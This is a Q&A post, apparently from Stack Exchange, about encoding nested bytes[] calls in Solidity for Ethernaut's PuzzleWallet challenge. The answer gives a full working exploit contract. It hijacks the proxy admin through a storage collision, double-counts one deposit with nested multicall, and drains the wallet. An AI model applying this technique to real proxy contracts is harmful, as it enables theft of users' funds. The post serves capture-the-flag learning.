# Encoding a bytes[] for encodeWithSignature

Tags: solidity

As part of the PuzzleWallet challenge from Ethernaut, I am looking to call this method of an external contract from my contract:

```
function multicall(bytes[] calldata data) external payable onlyWhitelisted
```

More specifically, I am trying to call with a recursive call.

```
         multidata
     ________|________
    |                 |
multidata          multidata
    |                 |
deposit            deposit
```

I am using `abi.encodeWithSignature` method but it looks like Solidity doesn't allow `Nested dynamic arrays not implemented here.`:

```
bytes memory data = abi.encode([bytes4(keccak256('deposit()'))]);
bytes memory singleMulticallData = abi.encodePacked(bytes4(keccak256('multicall(bytes[])')), data);
        
(bool successDeposit, ) = address(proxy).call(abi.encodeWithSignature("multicall(bytes[])", [singleMulticallData, singleMulticallData]));
require(successDeposit, "deposit not successful");
```

Any idea on how you could create an array of bytes which would contain bytes?

Answer (score 1):

1. Add "pragma experimental ABIEncoderV2;".

2.the follow is my solution For your reference.

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
pragma experimental ABIEncoderV2;

import "./PuzzleWallet.sol";

contract Exploit{
    PuzzleProxy public proxy;

    constructor(PuzzleProxy _proxy) public payable{
        require(msg.value == 0.001 ether, "incorrect msg.value");
        proxy = _proxy;
        proxy.proposeNewAdmin(address(this));

        PuzzleWallet wallet = PuzzleWallet(address(proxy));
        wallet.addToWhitelist(address(this));
     
        bytes memory data = abi.encodeWithSelector(PuzzleWallet.deposit.selector);

        bytes[] memory data1 = new bytes[](1);
        data1[0] = data;

        bytes memory data2 = abi.encodeWithSelector(PuzzleWallet.multicall.selector, data1);

        bytes[] memory data3 = new bytes[](2);
        data3[0] = data2;
        data3[1] = data2;
        

        wallet.multicall{value:0.001 ether}(data3);  
        uint256 balance  = wallet.balances(address(this));
        require(balance == 0.002 ether, "unexpected balance");

        wallet.execute(msg.sender, balance, new bytes(0));
        wallet.setMaxBalance(uint256(uint160(address(this))));

        require(proxy.admin() == address(this), "fail to exploit");
    }
}
```